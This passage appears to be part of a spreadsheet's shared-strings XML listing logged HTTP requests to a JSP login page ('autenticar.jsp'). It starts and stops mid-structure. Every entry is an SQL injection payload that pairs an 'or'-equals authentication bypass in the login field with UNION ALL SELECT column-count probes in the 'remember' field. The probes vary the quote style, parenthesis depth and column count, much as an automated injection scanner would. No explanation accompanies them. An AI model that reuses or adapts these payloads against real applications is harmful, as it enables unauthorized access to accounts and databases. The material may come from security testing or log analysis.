    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245--and(('fnwg'='fnwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307,9307--and(('cnrs'='cnrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012,6012--and((('iqrc'='iqrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059--and((('cjbq'='cjbq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542--and((('lxqw'='lxqw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239,6239--and((('hplf'='hplf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337,5337--and((('rwfc'='rwfc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595,595--and((('gwkk'='gwkk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636,4636--and((('hntf'='hntf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449,6449--and((('ryik'='ryik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275,7275--and((('eblc'='eblc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374--and((('cysn'='cysn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037--and'mhed'='mhed&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137,5137--and'owry'='owry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484,9484--and'erla'='erla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933--and'nlct'='nlct&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921--and'dapf'='dapf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257,3257--and'laoc'='laoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545,3545--and'rsxk'='rsxk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948,1948--and'djce'='djce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546,9546--and'ckaa'='ckaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994,994--and'sykw'='sykw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733,3733--and('lkgg'like'lkgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017,1017--and('zfrx'like'zfrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538,2538--and('lblr'like'lblr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580,2580--and('uknv'like'uknv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338,4338--and('rkny'like'rkny&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139--and('ynpk'like'ynpk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589,1589--and('ypnf'like'ypnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953,4953--and('kwjc'like'kwjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438,7438--and('ohqo'like'ohqo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895,4895--and('ztop'like'ztop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649,649--and(('rpwv'like'rpwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870,3870--and(('quma'like'quma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603,7603--and(('jlde'like'jlde&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787,6787--and(('blos'like'blos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772,8772--and(('ongm'like'ongm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146,8146--and(('ukct'like'ukct&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304,7304--and(('sykl'like'sykl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017--and(('thxd'like'thxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282,7282--and(('hsen'like'hsen&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613,5613--and(('tpqy'like'tpqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992--and((('ibzf'like'ibzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428--and((('nqbs'like'nqbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718,4718--and((('codx'like'codx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660,8660--and((('rhak'like'rhak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561,5561--and((('civy'like'civy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494,5494--and((('fiqi'like'fiqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569--and((('nbfn'like'nbfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294,2294--and((('lyfi'like'lyfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352,1352--and((('slzh'like'slzh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225,225--and((('fatc'like'fatc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843,8843--and'pvvx'like'pvvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279,9279--and'qegp'like'qegp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247,2247--and'bgpp'like'bgpp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788,788--and'vzmf'like'vzmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888--and'mnaq'like'mnaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908,908--and'bjwi'like'bjwi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313,4313--and'xxbh'like'xxbh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361,5361--and'qogn'like'qogn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788,9788--and'gykp'like'gykp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719,6719--and'lhnd'like'lhnd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854,4854--and("uthb"="uthb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704,704--and("gkor"="gkor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516,516--and("kued"="kued&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551,6551--and("ynwl"="ynwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136--and("ujod"="ujod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436,7436--and("ewtw"="ewtw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638,1638--and("rglh"="rglh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760,8760--and("svev"="svev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024--and("jkaq"="jkaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542,542--and("fyex"="fyex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575,4575--and(("qwlq"="qwlq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172,7172--and(("znzv"="znzv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053,9053--and(("qqyu"="qqyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613--and(("cuso"="cuso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574,5574--and(("yilv"="yilv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093,4093--and(("htdr"="htdr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936,3936--and(("upmf"="upmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940,9940--and(("ozci"="ozci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924,2924--and(("zokl"="zokl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791,6791--and(("halw"="halw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424,6424--and((("ucys"="ucys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885,5885--and((("cxuy"="cxuy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766--and((("lbss"="lbss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354,7354--and((("btwg"="btwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892,6892--and((("rqsg"="rqsg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402--and((("wneg"="wneg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228,9228--and((("gvfr"="gvfr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809--and((("vaef"="vaef&amp;modo=entrar</t>
  </si>
  <si>
